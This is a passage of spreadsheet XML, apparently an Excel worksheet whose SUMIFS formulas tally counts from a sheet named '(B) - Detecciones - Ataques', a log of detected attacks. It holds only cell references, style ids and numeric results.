        <v>1293</v>
      </c>
      <c r="CK27" s="318" t="s">
        <v>1331</v>
      </c>
      <c r="CL27" s="318" t="s">
        <v>2215</v>
      </c>
      <c r="CM27" s="318" t="s">
        <v>2261</v>
      </c>
      <c r="CN27" s="318" t="s">
        <v>359</v>
      </c>
      <c r="CO27" s="318" t="s">
        <v>1230</v>
      </c>
      <c r="CP27" s="318" t="s">
        <v>1812</v>
      </c>
      <c r="CQ27" s="318" t="s">
        <v>1958</v>
      </c>
      <c r="CR27" s="318" t="s">
        <v>1667</v>
      </c>
      <c r="CS27" s="318" t="s">
        <v>505</v>
      </c>
      <c r="CT27" s="318" t="s">
        <v>312</v>
      </c>
      <c r="CU27" s="318" t="s">
        <v>2289</v>
      </c>
      <c r="CV27" s="318" t="s">
        <v>411</v>
      </c>
      <c r="CW27" s="318" t="s">
        <v>1361</v>
      </c>
      <c r="CX27" s="318" t="s">
        <v>701</v>
      </c>
      <c r="CY27" s="318" t="s">
        <v>586</v>
      </c>
      <c r="CZ27" s="318" t="s">
        <v>294</v>
      </c>
      <c r="DA27" s="318" t="s">
        <v>339</v>
      </c>
      <c r="DB27" s="318" t="s">
        <v>370</v>
      </c>
      <c r="DC27" s="318" t="s">
        <v>394</v>
      </c>
      <c r="DD27" s="318" t="s">
        <v>1687</v>
      </c>
      <c r="DE27" s="318" t="s">
        <v>486</v>
      </c>
      <c r="DF27" s="318" t="s">
        <v>1889</v>
      </c>
      <c r="DG27" s="318" t="s">
        <v>1187</v>
      </c>
      <c r="DH27" s="318" t="s">
        <v>560</v>
      </c>
      <c r="DI27" s="318" t="s">
        <v>1175</v>
      </c>
      <c r="DJ27" s="321" t="s">
        <v>1926</v>
      </c>
      <c r="DK27" s="271"/>
      <c r="DO27" s="322"/>
      <c r="DP27" s="323" t="s">
        <v>2448</v>
      </c>
      <c r="DQ27" s="324" t="s">
        <v>6</v>
      </c>
      <c r="DR27" s="324" t="s">
        <v>7</v>
      </c>
      <c r="DS27" s="324" t="s">
        <v>8</v>
      </c>
      <c r="DT27" s="324" t="s">
        <v>9</v>
      </c>
      <c r="DU27" s="325" t="s">
        <v>2449</v>
      </c>
      <c r="DV27" s="271"/>
      <c r="DW27" s="323" t="s">
        <v>2448</v>
      </c>
      <c r="DX27" s="324" t="s">
        <v>6</v>
      </c>
      <c r="DY27" s="324" t="s">
        <v>7</v>
      </c>
      <c r="DZ27" s="324" t="s">
        <v>8</v>
      </c>
      <c r="EA27" s="324" t="s">
        <v>9</v>
      </c>
      <c r="EB27" s="325" t="s">
        <v>2450</v>
      </c>
      <c r="EC27" s="271"/>
      <c r="ED27" s="280"/>
      <c r="EG27" s="279"/>
      <c r="EH27" s="271"/>
      <c r="EI27" s="326" t="s">
        <v>2448</v>
      </c>
      <c r="EJ27" s="327" t="s">
        <v>6</v>
      </c>
      <c r="EK27" s="327" t="s">
        <v>7</v>
      </c>
      <c r="EL27" s="327" t="s">
        <v>8</v>
      </c>
      <c r="EM27" s="327" t="s">
        <v>9</v>
      </c>
      <c r="EN27" s="328" t="s">
        <v>2451</v>
      </c>
      <c r="EO27" s="329"/>
      <c r="EP27" s="329"/>
      <c r="EQ27" s="329"/>
      <c r="ER27" s="329"/>
      <c r="ES27" s="329"/>
      <c r="ET27" s="329"/>
      <c r="EU27" s="329"/>
      <c r="EV27" s="330" t="s">
        <v>2448</v>
      </c>
      <c r="EW27" s="331" t="s">
        <v>6</v>
      </c>
      <c r="EX27" s="331" t="s">
        <v>7</v>
      </c>
      <c r="EY27" s="331" t="s">
        <v>8</v>
      </c>
      <c r="EZ27" s="332" t="s">
        <v>9</v>
      </c>
      <c r="FA27" s="333"/>
      <c r="FC27" s="334" t="s">
        <v>2452</v>
      </c>
      <c r="FD27" s="335" t="s">
        <v>2453</v>
      </c>
      <c r="FE27" s="336">
        <f t="shared" ref="FE27:FH27" si="2">K109</f>
        <v>0.0499595818</v>
      </c>
      <c r="FF27" s="336">
        <f t="shared" si="2"/>
        <v>0.2301309595</v>
      </c>
      <c r="FG27" s="336">
        <f t="shared" si="2"/>
        <v>0.3886675449</v>
      </c>
      <c r="FH27" s="337">
        <f t="shared" si="2"/>
        <v>0.4401962768</v>
      </c>
      <c r="FK27" s="303" t="s">
        <v>2013</v>
      </c>
      <c r="FL27" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK27,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK27 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="FM27" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK27,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK27 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="FN27" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK27,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK27 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="FO27" s="304">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK27,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK27 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="FQ27" s="303" t="s">
        <v>2013</v>
      </c>
      <c r="FR27" s="338" t="s">
        <v>12</v>
      </c>
      <c r="FS27" s="338" t="s">
        <v>12</v>
      </c>
      <c r="FT27" s="338" t="s">
        <v>12</v>
      </c>
      <c r="FU27" s="339" t="s">
        <v>12</v>
      </c>
      <c r="FY27" s="21" t="s">
        <v>2454</v>
      </c>
      <c r="FZ27" s="20" t="s">
        <v>2455</v>
      </c>
      <c r="GA27" s="20" t="s">
        <v>2456</v>
      </c>
      <c r="GG27" s="340" t="s">
        <v>2457</v>
      </c>
      <c r="GH27" s="20" t="s">
        <v>2458</v>
      </c>
      <c r="GI27" s="20" t="s">
        <v>2459</v>
      </c>
      <c r="GJ27" s="341" t="s">
        <v>2460</v>
      </c>
      <c r="GK27" s="340" t="s">
        <v>2457</v>
      </c>
      <c r="GL27" s="20" t="s">
        <v>2458</v>
      </c>
      <c r="GM27" s="20" t="s">
        <v>2459</v>
      </c>
      <c r="GN27" s="341" t="s">
        <v>2460</v>
      </c>
      <c r="GO27" s="340" t="s">
        <v>2457</v>
      </c>
      <c r="GP27" s="20" t="s">
        <v>2458</v>
      </c>
      <c r="GQ27" s="20" t="s">
        <v>2459</v>
      </c>
      <c r="GR27" s="341" t="s">
        <v>2460</v>
      </c>
      <c r="GS27" s="342" t="s">
        <v>2457</v>
      </c>
      <c r="GT27" s="343" t="s">
        <v>2458</v>
      </c>
      <c r="GU27" s="343" t="s">
        <v>2459</v>
      </c>
      <c r="GV27" s="344" t="s">
        <v>2460</v>
      </c>
      <c r="HC27" s="21" t="s">
        <v>2454</v>
      </c>
      <c r="HD27" s="345" t="s">
        <v>2455</v>
      </c>
      <c r="HE27" s="345" t="s">
        <v>2456</v>
      </c>
      <c r="HF27" s="20" t="s">
        <v>2455</v>
      </c>
      <c r="HG27" s="345" t="s">
        <v>2456</v>
      </c>
    </row>
    <row r="28">
      <c r="B28" s="277"/>
      <c r="C28" s="346">
        <v>4022.0</v>
      </c>
      <c r="D28" s="347">
        <v>35763.0</v>
      </c>
      <c r="E28" s="347">
        <v>41529.0</v>
      </c>
      <c r="F28" s="348">
        <v>12067.0</v>
      </c>
      <c r="G28" s="278"/>
      <c r="J28" s="277"/>
      <c r="K28" s="349">
        <f>SUM('(B) - Detecciones - Ataques'!M3:M139)</f>
        <v>247720</v>
      </c>
      <c r="L28" s="350">
        <f>SUM('(B) - Detecciones - Ataques'!N3:N139)</f>
        <v>185276</v>
      </c>
      <c r="M28" s="350">
        <f>SUM('(B) - Detecciones - Ataques'!P3:P139)</f>
        <v>820108</v>
      </c>
      <c r="N28" s="351">
        <f>SUM('(B) - Detecciones - Ataques'!R3:R139)</f>
        <v>820127</v>
      </c>
      <c r="O28" s="278"/>
      <c r="Q28" s="271"/>
      <c r="R28" s="352" t="s">
        <v>2461</v>
      </c>
      <c r="S28" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$S27) + SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S27 &amp; "*") </f>
        <v>9461</v>
      </c>
      <c r="T28" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$T27) + SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $T27 &amp; "*") </f>
        <v>6951</v>
      </c>
      <c r="U28" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$U27) + SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $U27 &amp; "*") </f>
        <v>252</v>
      </c>
      <c r="V28" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$V27) + SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $V27 &amp; "*") </f>
        <v>39</v>
      </c>
      <c r="W28" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$W27) + SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $W27 &amp; "*") </f>
        <v>2</v>
      </c>
      <c r="X28" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$X27) + SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $X27 &amp; "*") </f>
        <v>24</v>
      </c>
      <c r="Y28" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$Y27) + SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $Y27 &amp; "*") </f>
        <v>22</v>
      </c>
      <c r="Z28" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$Z27) + SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $Z27 &amp; "*") </f>
        <v>9923</v>
      </c>
      <c r="AA28" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AA27) + SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AA27 &amp; "*") </f>
        <v>727</v>
      </c>
      <c r="AB28" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AB27) + SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AB27 &amp; "*") </f>
        <v>333</v>
      </c>
      <c r="AC28" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AC27) + SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AC27 &amp; "*") </f>
        <v>148</v>
      </c>
      <c r="AD28" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AD27) + SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AD27 &amp; "*") </f>
        <v>66858</v>
      </c>
      <c r="AE28" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AE27) + SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AE27 &amp; "*") </f>
        <v>114</v>
      </c>
      <c r="AF28" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AF27) + SUMIFS('(B) - Detecciones - Ataques'!M$3:M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AF27 &amp; "*") </f>
        <v>1046</v>
      </c>
      <c r="AG28" s="271"/>
      <c r="AH28" s="352" t="s">
        <v>2461</v>
      </c>
      <c r="AI28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>9394</v>
      </c>
      <c r="AJ28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>59</v>
      </c>
      <c r="AL28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>7</v>
      </c>
      <c r="AM28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>6951</v>
      </c>
      <c r="AN28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>130</v>
      </c>
      <c r="AR28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>5</v>
      </c>
      <c r="AS28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>9</v>
      </c>
      <c r="AU28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>90</v>
      </c>
      <c r="AV28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>18</v>
      </c>
      <c r="AW28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>27</v>
      </c>
      <c r="AY28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>10</v>
      </c>
      <c r="BA28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>2</v>
      </c>
      <c r="BB28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>3</v>
      </c>
      <c r="BD28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>7</v>
      </c>
      <c r="BF28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>11</v>
      </c>
      <c r="BG28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>3</v>
      </c>
      <c r="BH28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>1</v>
      </c>
      <c r="BI28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>1</v>
      </c>
      <c r="BJ28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>3</v>
      </c>
      <c r="BK28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>10</v>
      </c>
      <c r="BL28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>11</v>
      </c>
      <c r="BM28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>3297</v>
      </c>
      <c r="BN28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>6615</v>
      </c>
      <c r="BO28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>200</v>
      </c>
      <c r="BR28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>6</v>
      </c>
      <c r="BT28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>2</v>
      </c>
      <c r="BU28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>1</v>
      </c>
      <c r="BW28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>7</v>
      </c>
      <c r="BX28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>147</v>
      </c>
      <c r="BZ28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>266</v>
      </c>
      <c r="CA28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>3</v>
      </c>
      <c r="CC28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>2</v>
      </c>
      <c r="CD28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>2</v>
      </c>
      <c r="CG28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>1</v>
      </c>
      <c r="CH28" s="355">
